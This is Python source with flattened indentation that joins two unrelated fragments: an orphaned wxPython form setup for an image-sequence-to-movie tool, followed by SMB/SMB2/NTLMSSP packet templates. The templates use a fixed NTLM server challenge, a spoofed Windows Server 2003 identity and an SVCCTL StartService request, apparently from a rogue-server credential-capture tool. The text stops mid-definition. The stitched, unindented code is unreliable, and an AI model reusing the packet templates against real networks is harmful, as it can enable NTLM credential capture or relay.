def __init__(self, parent, refid=None, data={}):
self.initComplete = False
settings = data.get('settings', {})
inputs = data.get('inputs', {})
presetsFolder = data.get('presetsFolder', None)
self.recentSettings = []
self.outputPresets = ['Choose an output preset...']
self.loadPresets(presetsFolder)
baseDefaults = {
'outputPreset': self.outputPresets[0],
'selfContained': True,
'smartUpdate': True,
'fillMissing': False,
'interval': 3,
'unit': 'Days',
'printtasks': 5,
'jobdrop': 'Copy Job to Queue',
'recentSettings': 'None'
}
self._form = {
'Parts':
OrderedDict([
('General',
[[({
'type': 'StaticText',
'label': 'Image Sequence',
'name': 'imageSequenceLabel'
}, {
'type':
'wx.lib.filebrowsebutton.FileBrowseButtonWithHistory',
'name': 'imageSequence',
'labelText': '',
'flags': wx.EXPAND | wx.ALL,
'changeCallback': self.onSequenceUpdate
}),
({
'type': 'StaticText',
'label': 'Recent Settings'
}, {
'type': 'ComboBox',
'name': 'recentSettings',
'colGrowable': True,
'flags': wx.EXPAND | wx.ALL,
'style': wx.CB_READONLY
}),
({
'type': 'StaticText',
'label': 'Frame Range',
'name': 'frameRangeLabel'
}, {
'type': 'TextCtrl',
'name': 'frameRange',
'flags': wx.EXPAND | wx.ALL
}),
({
'type': 'StaticText',
'label': 'Audio File'
}, {
'type':
'wx.lib.filebrowsebutton.FileBrowseButtonWithHistory',
'name': 'audioFile',
'labelText': '',
'fileMask': 'Wave Files (*.wav)|*.wav',
'flags': wx.EXPAND | wx.ALL
}),
({
'type': 'StaticText',
'label': 'Output Preset',
'name': 'outputPresetLabel'
}, {
'type': 'ComboBox',
'name': 'outputPreset',
'colGrowable': True,
'flags': wx.EXPAND | wx.ALL,
'style': wx.CB_READONLY
}),
({
'type': 'StaticText',
'label': 'Output Movie',
'name': 'outputMovieLabel'
}, {
'type': 'FilePickerCtrl',
'name': 'outputMovie',
'wildcard': 'Quicktime Movie (*.mov)|*.mov',
'style': wx.FLP_SAVE | wx.FLP_OVERWRITE_PROMPT
| wx.FLP_USE_TEXTCTRL,
'flags': wx.EXPAND | wx.ALL
})]]),
('Advanced', [{
'type': 'CheckBox',
'name': 'selfContained',
'label': 'Self-contained'
}, {
'type': 'CheckBox',
'name': 'smartUpdate',
'label': 'Only update what\'s changed'
}, {
'type': 'CheckBox',
'name': 'fillMissingFrames',
'label': 'Fill in missing frames.'
}]),
]),
'Options': {
'outputPreset': self.outputPresets,
'unit': ['Hours', 'Days', 'Months'],
'jobdrop': ['Copy Job to Queue', 'Move Job to Queue'],
'recentSettings': ['None']
},
'Defaults':
dict(baseDefaults.items() + settings.items())
}
Form.__init__(self, parent)
if settings.has_key('imageSequence'):
self.loadRecentSettings(settings['imageSequence'])
self.applyRecentSetting()
self.loadInputs(inputs)
self.initComplete = True
class SMBDCESVCCTLStartService(Packet):
fields = OrderedDict([
("ContextHandle", ""),
("MaxCount", "\x00\x00\x00\x00\x00\x00\x00\x00"),
])
class EthARP(Packet):
fields = OrderedDict([
("DstMac", "\xff\xff\xff\xff\xff\xff"),
("SrcMac", ""),
("Type", "\x08\x06"), #ARP
])
class SMB2NegoAns(Packet):
fields = OrderedDict([
("Len", "\x41\x00"),
("Signing", "\x01\x00"),
("Dialect", "\xff\x02"),
("Reserved", "\x00\x00"),
("Guid",
"\xea\x85\xab\xf1\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x72\xa9"),
("Capabilities", "\x07\x00\x00\x00"),
("MaxTransSize", "\x00\x00\x10\x00"),
("MaxReadSize", "\x00\x00\x10\x00"),
("MaxWriteSize", "\x00\x00\x10\x00"),
("SystemTime", NTStamp(datetime.now())),
("BootTime", "\x22\xfb\x80\x01\x40\x09\xd2\x01"),
("SecBlobOffSet", "\x80\x00"),
("SecBlobLen", "\x78\x00"),
("Reserved2", "\x4d\x53\x53\x50"),
("InitContextTokenASNId", "\x60"),
("InitContextTokenASNLen", "\x76"),
("ThisMechASNId", "\x06"),
("ThisMechASNLen", "\x06"),
("ThisMechASNStr", "\x2b\x06\x01\x05\x05\x02"),
("SpNegoTokenASNId", "\xA0"),
("SpNegoTokenASNLen", "\x6c"),
("NegTokenASNId", "\x30"),
("NegTokenASNLen", "\x6a"),
("NegTokenTag0ASNId", "\xA0"),
("NegTokenTag0ASNLen", "\x3c"),
("NegThisMechASNId", "\x30"),
("NegThisMechASNLen", "\x3a"),
("NegThisMech1ASNId", "\x06"),
("NegThisMech1ASNLen", "\x0a"),
("NegThisMech1ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"),
("NegThisMech2ASNId", "\x06"),
("NegThisMech2ASNLen", "\x09"),
("NegThisMech2ASNStr", "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
("NegThisMech3ASNId", "\x06"),
("NegThisMech3ASNLen", "\x09"),
("NegThisMech3ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
("NegThisMech4ASNId", "\x06"),
("NegThisMech4ASNLen", "\x0a"),
("NegThisMech4ASNStr", "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
("NegThisMech5ASNId", "\x06"),
("NegThisMech5ASNLen", "\x0a"),
("NegThisMech5ASNStr", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("NegTokenTag3ASNId", "\xA3"),
("NegTokenTag3ASNLen", "\x2a"),
("NegHintASNId", "\x30"),
("NegHintASNLen", "\x28"),
("NegHintTag0ASNId", "\xa0"),
("NegHintTag0ASNLen", "\x26"),
("NegHintFinalASNId", "\x1b"),
("NegHintFinalASNLen", "\x24"),
("NegHintFinalASNStr", "*****@*****.**"),
("Data", ""),
])
def calculate(self):
StructLen = str(self.fields["Len"]) + str(
self.fields["Signing"]
) + str(self.fields["Dialect"]) + str(self.fields["Reserved"]) + str(
self.fields["Guid"]) + str(self.fields["Capabilities"]) + str(
self.fields["MaxTransSize"]) + str(
self.fields["MaxReadSize"]) + str(
self.fields["MaxWriteSize"]) + str(
self.fields["SystemTime"]) + str(
self.fields["BootTime"]) + str(
self.fields["SecBlobOffSet"]) + str(
self.fields["SecBlobLen"]) + str(
self.fields["Reserved2"])
SecBlobLen = str(self.fields["InitContextTokenASNId"]) + str(
self.fields["InitContextTokenASNLen"]
) + str(self.fields["ThisMechASNId"]) + str(
self.fields["ThisMechASNLen"]
) + str(self.fields["ThisMechASNStr"]) + str(
self.fields["SpNegoTokenASNId"]
) + str(self.fields["SpNegoTokenASNLen"]) + str(
self.fields["NegTokenASNId"]) + str(
self.fields["NegTokenASNLen"]) + str(
self.fields["NegTokenTag0ASNId"]) + str(
self.fields["NegTokenTag0ASNLen"]) + str(
self.fields["NegThisMechASNId"]) + str(
self.fields["NegThisMechASNLen"]) + str(
self.fields["NegThisMech1ASNId"]) + str(
self.fields["NegThisMech1ASNLen"]
) + str(
self.fields["NegThisMech1ASNStr"]
) + str(
self.fields["NegThisMech2ASNId"]
) + str(
self.fields["NegThisMech2ASNLen"]
) + str(
self.fields["NegThisMech2ASNStr"]
) + str(
self.fields["NegThisMech3ASNId"]
) + str(
self.fields["NegThisMech3ASNLen"]
) + str(
self.fields["NegThisMech3ASNStr"]
) + str(
self.fields["NegThisMech4ASNId"]
) + str(
self.fields["NegThisMech4ASNLen"]
) + str(
self.fields["NegThisMech4ASNStr"]
) + str(
self.fields["NegThisMech5ASNId"]
) + str(
self.fields["NegThisMech5ASNLen"]
) + str(
self.fields["NegThisMech5ASNStr"]
) + str(
self.fields["NegTokenTag3ASNId"]
) + str(
self.fields["NegTokenTag3ASNLen"]
) + str(self.fields["NegHintASNId"]) + str(
self.fields["NegHintASNLen"]) + str(
self.fields["NegHintTag0ASNId"]
) + str(
self.fields["NegHintTag0ASNLen"]
) + str(
self.fields["NegHintFinalASNId"]
) + str(
self.fields["NegHintFinalASNLen"]
) + str(
self.fields["NegHintFinalASNStr"])
AsnLenStart = str(self.fields["ThisMechASNId"]) + str(
self.fields["ThisMechASNLen"]
) + str(self.fields["ThisMechASNStr"]) + str(
self.fields["SpNegoTokenASNId"]
) + str(self.fields["SpNegoTokenASNLen"]) + str(
self.fields["NegTokenASNId"]
) + str(self.fields["NegTokenASNLen"]) + str(
self.fields["NegTokenTag0ASNId"]) + str(
self.fields["NegTokenTag0ASNLen"]) + str(
self.fields["NegThisMechASNId"]) + str(
self.fields["NegThisMechASNLen"]) + str(
self.fields["NegThisMech1ASNId"]) + str(
self.fields["NegThisMech1ASNLen"]) + str(
self.fields["NegThisMech1ASNStr"]) + str(
self.fields["NegThisMech2ASNId"]
) + str(
self.fields["NegThisMech2ASNLen"]
) + str(
self.fields["NegThisMech2ASNStr"]
) + str(
self.fields["NegThisMech3ASNId"]
) + str(
self.fields["NegThisMech3ASNLen"]
) + str(
self.fields["NegThisMech3ASNStr"]
) + str(
self.fields["NegThisMech4ASNId"]
) + str(
self.fields["NegThisMech4ASNLen"]
) + str(
self.fields["NegThisMech4ASNStr"]
) + str(
self.fields["NegThisMech5ASNId"]
) + str(
self.fields["NegThisMech5ASNLen"]
) + str(
self.fields["NegThisMech5ASNStr"]
) + str(
self.fields["NegTokenTag3ASNId"]
) + str(
self.fields["NegTokenTag3ASNLen"]
) + str(self.fields["NegHintASNId"]) + str(
self.fields["NegHintASNLen"]) + str(
self.fields["NegHintTag0ASNId"]
) + str(
self.fields["NegHintTag0ASNLen"]
) + str(
self.fields["NegHintFinalASNId"]
) + str(
self.fields["NegHintFinalASNLen"]
) + str(
self.fields["NegHintFinalASNStr"])
AsnLen2 = str(self.fields["NegTokenASNId"]) + str(
self.fields["NegTokenASNLen"]
) + str(self.fields["NegTokenTag0ASNId"]) + str(
self.fields["NegTokenTag0ASNLen"]
) + str(self.fields["NegThisMechASNId"]) + str(
self.fields["NegThisMechASNLen"]
) + str(self.fields["NegThisMech1ASNId"]) + str(
self.fields["NegThisMech1ASNLen"]) + str(
self.fields["NegThisMech1ASNStr"]) + str(
self.fields["NegThisMech2ASNId"]) + str(
self.fields["NegThisMech2ASNLen"]) + str(
self.fields["NegThisMech2ASNStr"]) + str(
self.fields["NegThisMech3ASNId"]) + str(
self.fields["NegThisMech3ASNLen"]) + str(
self.fields["NegThisMech3ASNStr"]
) + str(
self.fields["NegThisMech4ASNId"]
) + str(
self.fields["NegThisMech4ASNLen"]
) + str(
self.fields["NegThisMech4ASNStr"]
) + str(
self.fields["NegThisMech5ASNId"]
) + str(
self.fields["NegThisMech5ASNLen"]
) + str(
self.fields["NegThisMech5ASNStr"]
) + str(
self.fields["NegTokenTag3ASNId"]
) + str(
self.fields["NegTokenTag3ASNLen"]
) + str(self.fields["NegHintASNId"]) + str(
self.fields["NegHintASNLen"]) + str(
self.fields["NegHintTag0ASNId"]
) + str(
self.fields["NegHintTag0ASNLen"]
) + str(
self.fields["NegHintFinalASNId"]
) + str(
self.fields["NegHintFinalASNLen"]
) + str(
self.fields["NegHintFinalASNStr"])
MechTypeLen = str(self.fields["NegThisMechASNId"]) + str(
self.fields["NegThisMechASNLen"]
) + str(self.fields["NegThisMech1ASNId"]) + str(
self.fields["NegThisMech1ASNLen"]
) + str(self.fields["NegThisMech1ASNStr"]) + str(
self.fields["NegThisMech2ASNId"]
) + str(self.fields["NegThisMech2ASNLen"]) + str(
self.fields["NegThisMech2ASNStr"]) + str(
self.fields["NegThisMech3ASNId"]) + str(
self.fields["NegThisMech3ASNLen"]) + str(
self.fields["NegThisMech3ASNStr"]) + str(
self.fields["NegThisMech4ASNId"]) + str(
self.fields["NegThisMech4ASNLen"]) + str(
self.fields["NegThisMech4ASNStr"]) + str(
self.fields["NegThisMech5ASNId"]
) + str(
self.fields["NegThisMech5ASNLen"]
) + str(self.fields["NegThisMech5ASNStr"])
Tag3Len = str(self.fields["NegHintASNId"]) + str(
self.fields["NegHintASNLen"]) + str(
self.fields["NegHintTag0ASNId"]) + str(
self.fields["NegHintTag0ASNLen"]) + str(
self.fields["NegHintFinalASNId"]) + str(
self.fields["NegHintFinalASNLen"]) + str(
self.fields["NegHintFinalASNStr"])
#Sec Blob lens
self.fields["SecBlobOffSet"] = struct.pack("<h", len(StructLen) + 64)
self.fields["SecBlobLen"] = struct.pack("<h", len(SecBlobLen))
#ASN Stuff
self.fields["InitContextTokenASNLen"] = struct.pack(
"<B",
len(SecBlobLen) - 2)
self.fields["ThisMechASNLen"] = struct.pack(
"<B", len(str(self.fields["ThisMechASNStr"])))
self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2) - 2)
self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
self.fields["NegThisMech1ASNLen"] = struct.pack(
"<B", len(str(self.fields["NegThisMech1ASNStr"])))
self.fields["NegThisMech2ASNLen"] = struct.pack(
"<B", len(str(self.fields["NegThisMech2ASNStr"])))
self.fields["NegThisMech3ASNLen"] = struct.pack(
"<B", len(str(self.fields["NegThisMech3ASNStr"])))
self.fields["NegThisMech4ASNLen"] = struct.pack(
"<B", len(str(self.fields["NegThisMech4ASNStr"])))
self.fields["NegThisMech5ASNLen"] = struct.pack(
"<B", len(str(self.fields["NegThisMech5ASNStr"])))
self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len) - 2)
self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len) - 4)
self.fields["NegHintFinalASNLen"] = struct.pack(
"<B", len(str(self.fields["NegHintFinalASNStr"])))
class SMBSession1Data(Packet):
fields = OrderedDict([
("Wordcount", "\x04"),
("AndXCommand", "\xff"),
("Reserved", "\x00"),
("Andxoffset", "\x5f\x01"),
("Action", "\x00\x00"),
("SecBlobLen", "\xea\x00"),
("Bcc", "\x34\x01"),
("ChoiceTagASNId", "\xa1"),
("ChoiceTagASNLenOfLen", "\x81"),
("ChoiceTagASNIdLen", "\x00"),
("NegTokenTagASNId", "\x30"),
("NegTokenTagASNLenOfLen", "\x81"),
("NegTokenTagASNIdLen", "\x00"),
("Tag0ASNId", "\xA0"),
("Tag0ASNIdLen", "\x03"),
("NegoStateASNId", "\x0A"),
("NegoStateASNLen", "\x01"),
("NegoStateASNValue", "\x01"),
("Tag1ASNId", "\xA1"),
("Tag1ASNIdLen", "\x0c"),
("Tag1ASNId2", "\x06"),
("Tag1ASNId2Len", "\x0A"),
("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("Tag2ASNId", "\xA2"),
("Tag2ASNIdLenOfLen", "\x81"),
("Tag2ASNIdLen", "\xED"),
("Tag3ASNId", "\x04"),
("Tag3ASNIdLenOfLen", "\x81"),
("Tag3ASNIdLen", "\xEA"),
("NTLMSSPSignature", "NTLMSSP"),
("NTLMSSPSignatureNull", "\x00"),
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
("NTLMSSPNtWorkstationLen", "\x1e\x00"),
("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"),
("NTLMSSPNtServerChallenge", "\x81\x22\x33\x34\x55\x46\xe7\x88"),
("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("NTLMSSPNtTargetInfoLen", "\x94\x00"),
("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"),
("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh", "\x05"),
("NegTokenInitSeqMechMessageVersionLow", "\x02"),
("NegTokenInitSeqMechMessageVersionBuilt", "\xce\x0e"),
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionNTLMType", "\x0f"),
("NTLMSSPNtWorkstationName", "SMB12"),
("NTLMSSPNTLMChallengeAVPairsId", "\x02\x00"),
("NTLMSSPNTLMChallengeAVPairsLen", "\x0a\x00"),
("NTLMSSPNTLMChallengeAVPairsUnicodeStr", "smb12"),
("NTLMSSPNTLMChallengeAVPairs1Id", "\x01\x00"),
("NTLMSSPNTLMChallengeAVPairs1Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs1UnicodeStr", "SERVER2008"),
("NTLMSSPNTLMChallengeAVPairs2Id", "\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs2Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs2UnicodeStr", "smb12.local"),
("NTLMSSPNTLMChallengeAVPairs3Id", "\x03\x00"),
("NTLMSSPNTLMChallengeAVPairs3Len", "\x1e\x00"),
("NTLMSSPNTLMChallengeAVPairs3UnicodeStr", "SERVER2008.smb12.local"),
("NTLMSSPNTLMChallengeAVPairs5Id", "\x05\x00"),
("NTLMSSPNTLMChallengeAVPairs5Len", "\x04\x00"),
("NTLMSSPNTLMChallengeAVPairs5UnicodeStr", "smb12.local"),
("NTLMSSPNTLMChallengeAVPairs6Id", "\x00\x00"),
("NTLMSSPNTLMChallengeAVPairs6Len", "\x00\x00"),
("NTLMSSPNTLMPadding", ""),
("NativeOs", "Windows Server 2003 3790 Service Pack 2"),
("NativeOsTerminator", "\x00\x00"),
("NativeLAN", "Windows Server 2003 5.2"),
("NativeLANTerminator", "\x00\x00"),
])
def calculate(self):
##Convert strings to Unicode first...
self.fields["NTLMSSPNtWorkstationName"] = self.fields[
"NTLMSSPNtWorkstationName"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields[
"NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
self.fields["NativeOs"] = self.fields["NativeOs"].encode('utf-16le')
self.fields["NativeLAN"] = self.fields["NativeLAN"].encode('utf-16le')
###### SecBlobLen Calc:
AsnLen = str(self.fields["ChoiceTagASNId"]) + str(
self.fields["ChoiceTagASNLenOfLen"]
) + str(self.fields["ChoiceTagASNIdLen"]) + str(
self.fields["NegTokenTagASNId"]
) + str(self.fields["NegTokenTagASNLenOfLen"]) + str(
self.fields["NegTokenTagASNIdLen"]
) + str(self.fields["Tag0ASNId"]) + str(
self.fields["Tag0ASNIdLen"]) + str(
self.fields["NegoStateASNId"]) + str(
self.fields["NegoStateASNLen"]) + str(
self.fields["NegoStateASNValue"]) + str(
self.fields["Tag1ASNId"]) + str(
self.fields["Tag1ASNIdLen"]) + str(
self.fields["Tag1ASNId2"]) + str(
self.fields["Tag1ASNId2Len"]) + str(
self.fields["Tag1ASNId2Str"]
) + str(self.fields["Tag2ASNId"]) + str(
self.fields["Tag2ASNIdLenOfLen"]
) + str(
self.fields["Tag2ASNIdLen"]
) + str(
self.fields["Tag3ASNId"]
) + str(
self.fields["Tag3ASNIdLenOfLen"]
) + str(self.fields["Tag3ASNIdLen"])
CalculateSecBlob = str(self.fields["NTLMSSPSignature"]) + str(
self.fields["NTLMSSPSignatureNull"]
) + str(self.fields["NTLMSSPMessageType"]) + str(
self.fields["NTLMSSPNtWorkstationLen"]
) + str(self.fields["NTLMSSPNtWorkstationMaxLen"]) + str(
self.fields["NTLMSSPNtWorkstationBuffOffset"]
) + str(self.fields["NTLMSSPNtNegotiateFlags"]) + str(
self.fields["NTLMSSPNtServerChallenge"]
) + str(self.fields["NTLMSSPNtReserved"]) + str(
self.fields["NTLMSSPNtTargetInfoLen"]) + str(
self.fields["NTLMSSPNtTargetInfoMaxLen"]) + str(
self.fields["NTLMSSPNtTargetInfoBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionHigh"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"]
) + str(self.fields["NTLMSSPNtWorkstationName"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairsId"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairsLen"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs1Id"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs2Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs3Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs5Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"]
) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs6Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
##### Bcc len
BccLen = AsnLen + CalculateSecBlob + str(
self.fields["NTLMSSPNTLMPadding"]) + str(
self.fields["NativeOs"]) + str(
self.fields["NativeOsTerminator"]) + str(
self.fields["NativeLAN"]) + str(
self.fields["NativeLANTerminator"])
#SecBlobLen
self.fields["SecBlobLen"] = struct.pack("<h",
len(AsnLen + CalculateSecBlob))
self.fields["Bcc"] = struct.pack("<h", len(BccLen))
self.fields["ChoiceTagASNIdLen"] = struct.pack(
">B",
len(AsnLen + CalculateSecBlob) - 3)
self.fields["NegTokenTagASNIdLen"] = struct.pack(
">B",
len(AsnLen + CalculateSecBlob) - 6)
self.fields["Tag1ASNIdLen"] = struct.pack(
">B",
len(
str(self.fields["Tag1ASNId2"]) +
str(self.fields["Tag1ASNId2Len"]) +
str(self.fields["Tag1ASNId2Str"])))
self.fields["Tag1ASNId2Len"] = struct.pack(
">B", len(str(self.fields["Tag1ASNId2Str"])))
self.fields["Tag2ASNIdLen"] = struct.pack(
">B",
len(CalculateSecBlob + str(self.fields["Tag3ASNId"]) +
str(self.fields["Tag3ASNIdLenOfLen"]) +
str(self.fields["Tag3ASNIdLen"])))
self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))
###### Andxoffset calculation.
CalculateCompletePacket = str(self.fields["Wordcount"]) + str(
self.fields["AndXCommand"]) + str(self.fields["Reserved"]) + str(
self.fields["Andxoffset"]) + str(self.fields["Action"]) + str(
self.fields["SecBlobLen"]) + str(
self.fields["Bcc"]) + BccLen
self.fields["Andxoffset"] = struct.pack(
"<h",
len(CalculateCompletePacket) + 32)
###### Workstation Offset
CalculateOffsetWorkstation = str(
self.fields["NTLMSSPSignature"]
) + str(self.fields["NTLMSSPSignatureNull"]) + str(
self.fields["NTLMSSPMessageType"]
) + str(self.fields["NTLMSSPNtWorkstationLen"]) + str(
self.fields["NTLMSSPNtWorkstationMaxLen"]
) + str(self.fields["NTLMSSPNtWorkstationBuffOffset"]) + str(
self.fields["NTLMSSPNtNegotiateFlags"]
) + str(self.fields["NTLMSSPNtServerChallenge"]) + str(
self.fields["NTLMSSPNtReserved"]) + str(
self.fields["NTLMSSPNtTargetInfoLen"]) + str(
self.fields["NTLMSSPNtTargetInfoMaxLen"]
) + str(
self.fields["NTLMSSPNtTargetInfoBuffOffset"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionHigh"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionLow"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionBuilt"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionReserved"]
) + str(
self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])
###### AvPairs Offset
CalculateLenAvpairs = str(
self.fields["NTLMSSPNTLMChallengeAVPairsId"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"]) + (
self.fields["NTLMSSPNTLMChallengeAVPairs2Id"]
) + str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs3Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"]
) + (self.fields["NTLMSSPNTLMChallengeAVPairs5Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"]) + (
self.fields["NTLMSSPNTLMChallengeAVPairs6Id"]) + str(
self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])
##### Workstation Offset Calculation:
self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack(
"<i", len(CalculateOffsetWorkstation))
self.fields["NTLMSSPNtWorkstationLen"] = struct.pack(
"<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack(
"<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
##### IvPairs Offset Calculation:
self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack(
"<i",
len(CalculateOffsetWorkstation +
str(self.fields["NTLMSSPNtWorkstationName"])))
self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack(
"<h", len(CalculateLenAvpairs))
self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack(
"<h", len(CalculateLenAvpairs))
##### IvPair Calculation:
self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack(
"<h",
len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
class SMBNegoData(Packet):
fields = OrderedDict([
("BuffType", "\x02"),
("Dialect", "NT LM 0.12\x00"),
])
class SMB2Session1Data(Packet):
fields = OrderedDict([
("Len", "\x09\x00"),
("SessionFlag", "\x01\x00"),
("SecBlobOffSet", "\x48\x00"),
("SecBlobLen", "\x06\x01"),
("ChoiceTagASNId", "\xa1"),
("ChoiceTagASNLenOfLen", "\x82"),
("ChoiceTagASNIdLen", "\x01\x02"),
("NegTokenTagASNId", "\x30"),
("NegTokenTagASNLenOfLen", "\x81"),
("NegTokenTagASNIdLen", "\xff"),
("Tag0ASNId", "\xA0"),
("Tag0ASNIdLen", "\x03"),
("NegoStateASNId", "\x0A"),
("NegoStateASNLen", "\x01"),
("NegoStateASNValue", "\x01"),
("Tag1ASNId", "\xA1"),
("Tag1ASNIdLen", "\x0c"),
("Tag1ASNId2", "\x06"),
("Tag1ASNId2Len", "\x0A"),
("Tag1ASNId2Str", "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
("Tag2ASNId", "\xA2"),
("Tag2ASNIdLenOfLen", "\x81"),
("Tag2ASNIdLen", "\xE9"),
("Tag3ASNId", "\x04"),
("Tag3ASNIdLenOfLen", "\x81"),
("Tag3ASNIdLen", "\xE6"),
("NTLMSSPSignature", "NTLMSSP"),
("NTLMSSPSignatureNull", "\x00"),
("NTLMSSPMessageType", "\x02\x00\x00\x00"),
("NTLMSSPNtWorkstationLen", "\x1e\x00"),
("NTLMSSPNtWorkstationMaxLen", "\x1e\x00"),
("NTLMSSPNtWorkstationBuffOffset", "\x38\x00\x00\x00"),
("NTLMSSPNtNegotiateFlags", "\x15\x82\x89\xe2"),
("NTLMSSPNtServerChallenge", "\x82\x21\x32\x14\x51\x46\xe2\x83"),
("NTLMSSPNtReserved", "\x00\x00\x00\x00\x00\x00\x00\x00"),
("NTLMSSPNtTargetInfoLen", "\x94\x00"),
("NTLMSSPNtTargetInfoMaxLen", "\x94\x00"),
("NTLMSSPNtTargetInfoBuffOffset", "\x56\x00\x00\x00"),
("NegTokenInitSeqMechMessageVersionHigh", "\x06"),
("NegTokenInitSeqMechMessageVersionLow", "\x03"),
("NegTokenInitSeqMechMessageVersionBuilt", "\x80\x25"),
("NegTokenInitSeqMechMessageVersionReserved", "\x00\x00\x00"),
